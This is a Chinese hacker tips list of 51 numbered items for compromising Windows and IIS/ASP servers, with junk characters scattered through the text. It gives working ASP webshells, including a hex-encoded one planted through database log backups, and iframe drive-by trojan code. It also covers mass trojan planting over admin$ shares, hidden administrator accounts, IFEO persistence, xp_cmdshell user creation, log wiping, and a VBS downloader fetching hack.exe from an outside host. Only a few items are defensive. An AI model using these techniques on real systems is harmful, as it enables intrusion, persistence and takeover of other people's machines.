1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
2 p; f0 d1 `4 w+ I! {0 |5 Kcacls C:\windows\system32 /G hqw20:R5 T# p% I) g/ B; a
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
0 i4 v2 B% K/ {- n- b! L- `* m4 t8 O- c恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F, U. C* h& ?" e4 m: n
* _" Z* i. M* E# x2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。/ L' Y) ?6 M2 |4 H3 ~9 e( m& V
2 [; v5 P* k, @" T# X3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。& b( G% @/ J/ C8 [
6 p+ I' D; y6 u$ Z5 ~. U: c
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
6 H( u& `1 d" j# r% b- G9 h) C
* x; d& |3 j6 ]. q9 Y% }5、利用INF文件来修改注册表2 W W% K2 i" U* V. A! G% u4 M
[Version] t5 ~6 E1 `& e. K* y6 v
Signature="$CHICAGO$"- M Z) z4 T" H. k6 F* K) V. T
[Defaultinstall] B; Z1 g: h, G, G& Y
addREG=Ating/ Z, Z+ D. O: m' u2 c% x* ~/ x/ Y
[Ating]
1 X+ p5 l) c4 u. t3 |+ qHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"+ U; A% E$ y6 r& J( b
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
% F/ c% Z9 R0 m* Arundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径: U3 n; q' Q* B: ^0 Z
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU, H2 \9 y1 ~6 q* t& S; Z' }9 ^
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
% n" }* C8 [4 K8 XHKEY_CURRENT_CONFIG 简写为 HKCC) A. O4 x' |2 \
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
; ?' p" x# B8 r% k"1"这里代表是写入或删除注册表键值中的具体数据 F0 N9 u$ a- t: m7 P: L
7 X% B$ z% ]/ C+ T' u5 U6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
' [3 J3 e! G( H多了一步就是在防火墙里添加个端口,然后导出其键值! V8 v2 d8 r9 y4 ^4 ]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
4 v7 I l D | u2 G; V, A$ s4 k6 a$ Y& K
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽5 R" p `: D7 u* Y3 o8 G! a
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。 i. I, d b9 h4 e4 W$ u! D3 f
3 H2 C+ I# \ m1 C, w/ h/ U( x8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。9 ~2 r& |9 @) f2 n) A# e8 M) X" y. w& o; E
8 V. s4 ^# F# I& O4 j9 p9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,* a% ~$ b" k2 Y' V1 S1 d) F
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
& V4 A @3 a# D# M+ \* `% N" _" k- q) s, |6 ^9 C% \2 X
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
2 f, p# ]0 @7 s; E2 S) I* w' p: {
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
# u& {6 w' g& Z用法:xsniff –pass –hide –log pass.txt
5 C1 I5 a! Z% \9 Z( i* t
) l' T" i6 O7 B* _7 P7 q12、google搜索的艺术
( d$ ?+ p0 q7 }" C搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
9 _4 g; W: A7 Z9 }# B2 S; b6 B. o或“字符串的语法错误”可以找到很多sql注入漏洞。: y4 q- K) m* X( P+ @
0 x$ w' Z4 \$ Q4 @& P13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。9 h$ H* k1 B% K" j" K
! N* z" G$ x u+ F, {8 y2 G
14、cmd中输入 nc –vv –l –p 1987
) H# p' U8 o% J8 b: I做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
8 V$ A9 q* R/ }. c$ n w+ {7 G
5 [6 y: m* F7 F7 W# A* @15、制作T++木马,先写个ating.hta文件,内容为
; Z2 }9 c- C2 B0 e<script language="VBScript">; o, {4 ?1 ~! k: B
set wshshell=createobject ("wscript.shell" )1 L+ h: g& H6 v( E8 O
a=wshshell.run("你马的名称",1)
! h3 u2 w4 Q+ Y: ^6 C$ Q( Awindow.close$ g6 ?; J) @ `) r7 P5 R
</script>
t9 @ Q/ N: Z9 p再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。1 x t- \& g; o( F% V
1 K0 _' T! X7 v* D) k. m16、搜索栏里输入
$ s+ a$ m) ?* k) C1 w4 ~. D; X/ e* ], X关键字%'and 1=1 and '%'='
, x( _ w8 |8 Y3 t关键字%'and 1=2 and '%'='! ~4 h" _9 b, H
比较不同处 可以作为注入的特征字符7 |1 o4 b) x. H4 m% U
+ R8 G/ x3 A, C5 i
17、挂马代码<html>
3 g& U) b" \5 n. B' h- A<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>/ n) h" u" m4 a/ s
</html>
& x1 U( g8 W$ q- i
& }7 q3 m8 u: _8 v, C18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,' y* }; ^9 W c; f4 o P/ a [
net localgroup administrators还是可以看出Guest是管理员来。
- f7 s1 N( u3 u8 t) }0 u' Y
" q- }1 a3 e1 ^0 K2 d: V9 R19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等! u- U% {6 B5 V" v0 Q0 K
用法: 安装: instsrv.exe 服务名称 路径
, q7 z5 ?9 c* ^2 W卸载: instsrv.exe 服务名称 REMOVE
! Z3 R6 Q# N" u7 o* d! o) u, v% G) ~; Z4 t( y/ y# C. U$ J
9 L- t& Q/ t; l6 p7 F
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
s: m2 w% R( ^7 {8 ?5 D不能注入时要第一时间想到%5c暴库。' f: S/ @7 `9 m) L, K' ^
( j4 [' O- t8 m
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~& O2 n/ q, ~1 U
, S a4 x5 C* y, w+ [
23、缺少xp_cmdshell时
9 ^: b* e5 Q H+ ?. O尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
# u: a1 N/ ?7 n, s) L假如恢复不成功,可以尝试直接加用户(针对开3389的)% f2 w& p" [6 D* ~9 L& U
declare @o int
7 v( A2 y6 }5 ?/ {& g) v- x t% ]exec sp_oacreate 'wscript.shell',@o out* i& H0 s3 U, C4 n
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员4 ?' v4 l* _- x8 d4 n
$ m: z( ]; ]5 o# s5 W: R0 H
24.批量种植木马.bat U- y2 j( ?1 l w
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中! M" h, [# ]$ a! ?5 t. x0 S6 _! S
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间3 L- o" }; s- c3 x* ^
扫描地址.txt里每个主机名一行 用\\开头
4 d' }2 m E+ I X. u! u# P. \0 J4 H+ @- l7 @7 H
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。' Y4 z& B( M! M5 r
+ C& H, P, i1 p4 K
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.+ `$ F5 w9 u/ W2 Y3 ^& S
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下., M1 `8 j0 f9 W% j: l: C9 P( ]' L
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马$ ]: i9 ?7 _1 K! \7 e
$ w/ P( e4 m$ ?5 E* @6 e27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP4 m9 m) q2 J1 `$ g4 D- n& T3 h2 o: [- `
然后用#clear logg和#clear line vty *删除日志
0 F0 m% T" P9 z! `# f& }
3 U/ `& T5 b( u) |8 b3 N28、电脑坏了省去重新安装系统的方法
4 s) ?( K9 U; Q纯dos下执行,
6 P! Q1 E( _2 z4 R/ r1 Oxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config' V3 u" b1 g8 {8 D
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
1 B6 @. S, V4 ?2 n; x
' u, s8 W0 @% H7 ^29、解决TCP/IP筛选 在注册表里有三处,分别是:
: K& o6 ?* v+ `2 E. E9 l2 L0 JHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, F1 m P/ W$ Z3 w: h* t; ~: ~/ @
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip# O2 }( X d- U& M) B c* V' C
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; p. _% _, ]* z) h0 O# `/ P7 m" W0 Z
分别用
b# g6 k) g0 f- M5 `regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ C$ S" e9 G+ ?4 n
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- ~9 q+ I# I$ S) Zregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, B. b# ^: P# C4 x( H+ _0 b! A
命令来导出注册表项
/ u! ^( o4 |( n然后把三个文件里的EnableSecurityFilters"=dword:00000001,, S' D' L! M+ U$ @3 q
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用9 o6 A" I) b& ?: V, ^ ~( J
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
9 b W/ m# a2 U& u8 _7 j' q" U$ X. u* _) i m$ }
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U8 A0 l1 x% b8 T. p7 v/ x
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3. n2 y+ ?" s- z! H2 j, h
- _6 Y, T+ g |3 f ~# U
31、全手工打造开3389工具8 T8 F: J) M# @5 c& M) w, @0 }
打开记事本,编辑内容如下:
6 h1 L2 K! P' c) W9 @& G4 h/ I( Jecho [Components] > c:\sql6 y7 K* z2 I& m! z
echo TSEnable = on >> c:\sql# y( n. k j# U9 \( c- M
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
; C( B* Q% @; b9 C N/ I1 R" c J; _编辑好后存为BAT文件,上传至肉鸡,执行/ F7 v) p4 A) S, g1 j" Y
$ E- }' I1 \; V* A32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马8 O7 h9 l1 X! E
( ? |# h9 g& v( u33、让服务器重启
& u6 k6 U+ R) a$ M% u3 C9 o写个bat死循环:( p# u$ [0 ~9 x7 z
@echo off
3 R+ d+ L9 M0 v4 \6 N:loop1( [( K# a" b% U+ ?7 s7 p
cls- P1 L+ G; I' D" K1 p5 _, U, a
start cmd.exe* k/ O4 w6 Q: V' l
goto loop15 a) o6 Y# E" p) n
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启& Z: b2 |& ]7 V2 v! J) Z1 D9 |
) X6 b3 ~3 V" a1 B5 `3 O/ q34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,# t* L; g# v: ?4 o9 U
@echo off
7 `5 k2 w% G! f8 Z" I8 adate /t >c:/3389.txt5 I1 p7 k- n2 B+ b& Q) z! E* y
time /t >>c:/3389.txt! A7 c- j3 B# o, I/ \5 _7 l
attrib +s +h c:/3389.bat) J6 j5 m4 M( d5 z& h
attrib +s +h c:/3389.txt) T# ?# H \8 P
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
, P" r% h: ^5 u* H6 P& A& o并保存为3389.bat
3 q1 v; t$ N, X$ V7 y打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号' }& h$ V+ g' a" m
, M0 i( J) b+ r35、有时候提不了权限的话,试试这个命令,在命令行里输入:
& N2 J4 _& W0 A( p; ^start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
6 y: C9 k/ W, J/ O+ z( Z, _$ A& } Q输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。$ N P8 F* J3 |+ Y
$ c7 s6 c) H$ l) t9 e+ `3 I36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件: l% S H9 @( | @+ K
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
" a7 h9 O( V+ G8 |9 G/ ]) Jecho 你的FTP账号 >>c:\1.bat //输入账号* T0 R4 P# S) h. U' K
echo 你的FTP密码 >>c:\1.bat //输入密码& ~; _! G! k2 L0 i( `/ Z9 {
echo bin >>c:\1.bat //登入
1 ^. l' [7 Y/ t9 o2 K' g0 y( mecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么/ p7 Z: I5 D, n: o
echo bye >>c:\1.bat //退出: c8 W) k! e- `
然后执行ftp -s:c:\1.bat即可5 ]1 A0 A0 _( j" k j! n& K* [$ N& J
; a* ?; Y- c; [$ x9 i
37、修改注册表开3389两法4 E, V0 n7 v6 j T, D: `( e
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
& L, [- n) T% G( S$ techo Windows Registry Editor Version 5.00 >>3389.reg
- P( \! n& p. v' ?0 Techo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg. a U; O3 M4 Q7 j& [7 C8 C. b" O
echo "Enabled"="0" >>3389.reg
2 A3 q0 d3 q+ aecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
% P/ X/ r% H* A' m7 x% XNT\CurrentVersion\Winlogon] >>3389.reg
& p. u2 k2 Z$ t2 s5 I" w0 }4 vecho "ShutdownWithoutLogon"="0" >>3389.reg
2 j1 f( E9 e% x; c5 C2 \echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
7 ?- z, y* E2 B1 E6 N! e/ K: A d2 d>>3389.reg1 H) x1 T/ c) h+ S1 s6 D5 B+ t, E* }
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg: U; {7 s0 v- L) b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
V! Q4 u2 l) }3 b* S6 E, r>>3389.reg
/ L0 g/ B" C" \6 E" D ]" Kecho "TSEnabled"=dword:00000001 >>3389.reg4 E7 i$ F! c2 r, B0 M, e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
& T" q( a& W- \. o$ decho "Start"=dword:00000002 >>3389.reg
K' e! U* q, Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
$ g+ r, L5 c& N5 Q: H# h- n* q>>3389.reg
+ d; `6 z) J& ?. B" S2 u, I7 T n/ A; Qecho "Start"=dword:00000002 >>3389.reg0 j2 ?8 |, o9 q" O
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg+ B; x9 z6 L d8 P2 [0 Y! s: J
echo "Hotkey"="1" >>3389.reg
+ {, m, O2 q( w- S3 p( kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- V V3 J& t- v8 r9 N7 iServer\Wds\rdpwd\Tds\tcp] >>3389.reg1 K% u m. V" p- z7 {# z
echo "PortNumber"=dword:00000D3D >>3389.reg" I: i& P2 k! _, c$ N) t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( B# n0 F/ [0 S2 o4 S+ C- GServer\WinStations\RDP-Tcp] >>3389.reg; N7 c% f2 K6 a" h
echo "PortNumber"=dword:00000D3D >>3389.reg) A( N( R) R9 t+ Z6 i- j
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。4 A0 J! N) U4 C8 @) C
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)" s7 D; ]& M9 i' i7 I
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效$ s2 X- v* o% \- G u
(2)winxp和win2003终端开启
9 n# T' ~- \: {9 z0 P用以下ECHO代码写一个REG文件:3 \4 k% X, }6 ~2 M: @
echo Windows Registry Editor Version 5.00>>3389.reg* y; I% W7 t0 L8 o1 [0 c: \3 g" | O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal$ C% t$ b% g `9 K$ ~) h; s: Q/ M
Server]>>3389.reg
& x2 s4 S0 W. N D% ?; techo "fDenyTSConnections"=dword:00000000>>3389.reg
8 _. S d q* y4 N' E0 G* z; decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 Y% I; b& ?/ |: h C* S; ^8 ~" H6 D
Server\Wds\rdpwd\Tds\tcp]>>3389.reg8 ]$ v& a9 c6 w" o
echo "PortNumber"=dword:00000d3d>>3389.reg
6 n4 }: V! K0 x. b6 ~8 ^+ Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" S7 C0 `( `, d6 KServer\WinStations\RDP-Tcp]>>3389.reg
$ E. k p5 ?1 B1 Q0 P2 Techo "PortNumber"=dword:00000d3d>>3389.reg
; B. K+ q$ {/ X9 u" e0 n然后regedit /s 3389.reg del 3389.reg
+ n( `5 J- D+ R" G3 T9 u( [XP下不论开终端还是改终端端口都不需重启
, d$ m/ v F9 B; p1 G4 }/ H# ~+ C: \2 Y
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
) i$ f% K0 L& u% r7 X# |+ w用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'4 f+ y% l) _' v3 g( M) X
* S% n8 s+ k9 R. N; c
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
) `+ M9 H& s3 p8 C( f! c(1)数据库文件名应复杂并要有特殊字符
8 a0 D& x8 l1 D$ L/ {(2)不要把数据库名称写在conn.asp里,要用ODBC数据源0 l8 H" d @3 b) B1 Q) z
将conn.asp文档中的+ z2 n+ }3 [( }6 {! X3 e4 O0 s# ^
DBPath = Server.MapPath("数据库.mdb")
* a8 D/ K \% s- c* Aconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
* h. I0 u$ f8 D' h" A6 t3 Y1 T# z& n- P: I6 n1 N7 N
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
+ s8 w3 W. w3 I4 d! x(3)不放在WEB目录里
: g% V$ d% k6 U7 l8 y9 O4 |/ s5 w! z+ J v! l# \0 A/ c+ K( x3 Q5 p* `! g
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉+ u! ]$ ?- }; j* c. `
可以写两个bat文件+ e4 T4 g, k, o' K9 G! D% M4 \- E
@echo off
# T& C- ?1 J' {6 Z7 _: E$ e@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe7 b( M# L7 z2 P; R. H$ _
@del c:\winnt\system32\query.exe) A5 E- [. L. C7 g" y; g" q, m
@del %SYSTEMROOT%\system32\dllcache\query.exe& B) C8 {3 [* |+ L( q; @# V
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的2 ~8 n" J1 b4 P* g8 m+ U9 h7 X& d2 U1 g
5 y+ C+ | i+ |* {: S3 X6 k7 N$ u@echo off
. v% p9 T& f3 l3 L- ^: G4 S@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
: m" m. G& m4 T* Q7 l7 ~@del c:\winnt\system32\tsadmin.exe1 l# s8 n* p- H( [. q. h
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
+ x! l `* N( _* R$ f
; K! h! C3 J$ V41、映射对方盘符9 R# D0 G% r, z7 |% f( z0 \$ a$ X
telnet到他的机器上,+ J6 }& O+ s7 M! p y
net share 查看有没有默认共享 如果没有,那么就接着运行4 S( r1 m! ]7 o: z0 W) O& f& I
net share c$=c:; U+ `+ ^: r1 T! d) _$ o
net share现在有c$
+ K5 ^6 V( |9 h) k在自己的机器上运行6 g* A* @/ K: |7 o f0 b
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K: x; K0 m' H+ v0 d! ~
0 _, [0 g/ e. Q, N6 t42、一些很有用的老知识
& n8 |5 ?3 ^7 L6 H$ m- O6 }type c:\boot.ini ( 查看系统版本 )- H6 ~9 U3 V; g' C) |) ^
net start (查看已经启动的服务)8 ^8 P9 l1 S# l6 y. u
query user ( 查看当前终端连接 ); s# @ H. M9 M% {- E. a9 L
net user ( 查看当前用户 )
]% p4 I4 ^% v7 W: d' y% bnet user 用户 密码/add ( 建立账号 ). Y. S3 B, B. i% @1 l- l3 j
net localgroup administrators 用户 /add (提升某用户为管理员)
( P3 H% ^6 B' D( z/ L1 uipconfig -all ( 查看IP什么的 )
$ d* z/ o8 f$ \5 {2 enetstat -an ( 查看当前网络状态 )! T4 D3 F) f: S
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)# [; q( \) v9 F5 V, B& ]
克隆时Administrator对应1F4
) X$ ^9 x3 N. G# V, a- M' E5 uguest对应1F5
: I0 N5 t- ~" O& t- rtsinternetuser对应3E8' r4 |5 d2 o' c; j% h3 H$ h
# z' v5 I! g# B43、如果对方没开3389,但是装了Remote Administrator Service6 t- i& Z- J9 u w& |
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接: r* V& [; v" v8 D- t
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
" E+ u, c7 G4 g2 v先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
6 p/ r6 u, M! I' _ Q& b) ^' N: n* \& P: G$ C* x1 u9 B9 ~ u1 e2 x8 X
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)5 w$ Z7 f1 ^2 @ D5 H( D+ j4 E
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口): ]8 {- |6 E7 I8 `2 e9 {* R+ ^
) E0 K; y& z! g8 K2 N7 Z0 v
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
- {9 Q5 v! ]) A: a5 |% Xecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
; u/ h0 p- g: d: t' \# ~! a2 j^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
# E4 b5 w k/ X! q- kCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =# Z0 T0 z, L" @4 _; m; t/ V
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
+ _% }1 S/ _" S( [) _4 o, k(这是完整的一句话,其中没有换行符)
/ g6 g& k: y% O5 p# v7 s. p3 e; A然后下载:
" ?0 ~1 _4 k5 W( G- ]6 k, Wcscript down.vbs http://www.hack520.org/hack.exe hack.exe& t n. k3 N+ r( T: @8 Q6 d( ]0 e
4 h) x) m5 d6 ]9 n/ w
46、一句话木马成功依赖于两个条件:
( y* W- x+ B1 P5 q, V1、服务端没有禁止adodb.Stream或FSO组件 Y) y* G2 ]2 ~7 N: n
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。9 m5 J4 a4 O' Z) U0 T* u; P6 t$ Y
' i& A: q1 n3 X
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
" d' C* Z8 Z7 L;alter database utsz set RECOVERY FULL--
9 t6 W" B& S0 ~* }5 p2 V;create table cmd (a image)--
$ V% h" O/ L: a. H* @2 M;backup log utsz to disk = 'D:\cmd' with init--& g* T. g$ g6 C
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--, L7 h) A& ?% }/ `
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
; y) u5 I4 E: D注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。4 s, N& b0 N) J9 m4 G$ ~$ Q8 I" l
8 p6 B w: X, I; B' y# G48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:3 i1 T5 B2 |( T
3 \' x2 w4 {; ?) Y
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
% F0 r3 Y! K; T0 P4 o: E' K所有会话用 'all'。
/ m- b( h# |3 t1 ?4 f" ?8 _-s sessionid 列出会话的信息。
# I" t( ?7 a/ h8 z" X0 t4 u-k sessionid 终止会话。
) Q7 a7 T2 y' i {2 W1 P-m sessionid 发送消息到会话。
E5 d+ x5 Q: \8 M1 l6 W' G8 Y( z+ _: @) ~% J5 E2 z( _( s* C
config 配置 telnet 服务器参数。) M5 V1 `; R) s$ i1 l, Z5 G
# J% G' X" v5 u g9 D& I
common_options 为:6 J2 O2 |, f* h7 B& f
-u user 指定要使用其凭据的用户
0 f5 f3 s6 a6 E- c! x-p password 用户密码
/ Q0 \/ v5 R$ N& s7 x2 @+ w
; E2 b5 ?. u, A9 y0 D* R9 t6 aconfig_options 为:: i, z; ]! Q% d$ _
dom = domain 设定用户的默认域
$ O/ T% G* Y- G" \" k( z9 E$ Wctrlakeymap = yes|no 设定 ALT 键的映射" R5 c5 z2 D" a& f P% h
timeout = hh:mm:ss 设定空闲会话超时值- m1 M5 C& o- s6 H# W# r! ?$ K
timeoutactive = yes|no 启用空闲会话。( S) Q; z7 k' ~0 |2 t
maxfail = attempts 设定断开前失败的登录企图数。
. O% K) H: U$ L9 e9 M5 Amaxconn = connections 设定最大连接数。) }8 r% u. L: M5 c+ g
port = number 设定 telnet 端口。
4 }6 Y( k: T/ e- T7 s. z6 g9 Rsec = [+/-]NTLM [+/-]passwd& {2 g3 e+ S! d t! W! I0 {9 m4 U
设定身份验证机构
! a( U& r9 ^9 ~9 Cfname = file 指定审计文件名。
$ E$ O _( g6 L! L1 {fsize = size 指定审计文件的最大尺寸(MB)。
Z8 @9 |) t+ K+ kmode = console|stream 指定操作模式。" ^. R& ]3 x; F2 {, @
auditlocation = eventlog|file|both
1 O7 f$ o) a/ k2 {" C3 M! a指定记录地点
5 V5 F% F. K4 w" o( Naudit = [+/-]user [+/-]fail [+/-]admin
- M" [6 `& |: o! C8 D/ d
# I7 `# ]9 `8 b8 ^49、例如:在IE上访问:
+ |8 S) y' m2 ]+ ywww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
+ i S, j8 v% z! e- i8 `hack.txt里面的代码是:
+ _: |5 Q9 ?( m b% ^<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">, C, \) u- J2 `6 \
把这个hack.txt发到你空间就可以了!3 O: K$ E9 j h T) D, k
这个可以利用来做网马哦!7 C# t4 M! |! ?% g
- p% `3 v: E# m1 B3 B1 W50、autorun的病毒可以通过手动限制!; p: P" z5 ], }0 h# Z! ^' Z% R
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!+ N2 Q7 m& O% z+ s- ]* X$ F
2,打开盘符用右键打开!切忌双击盘符~1 o& d) d( b0 K" b
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!8 ~9 g! G2 S7 b5 E$ W
% t# E$ s' }6 C- |51、log备份时的一句话木马:
; {& Z* |- s5 za).<%%25Execute(request("go"))%%25>, ?( L- [' j" e2 o
b).<%Execute(request("go"))%>
$ J+ y5 j6 x. _7 M4 u# Mc).%><%execute request("go")%><%
$ f: W- l' g3 k8 p# w8 ]- G0 X7 Zd).<script language=VBScript runat=server>execute request("sb")</Script>) [: J' T! z n- r9 k v5 w9 ^
e).<%25Execute(request("l"))%25>: D; R: H% g- j: a& X% o
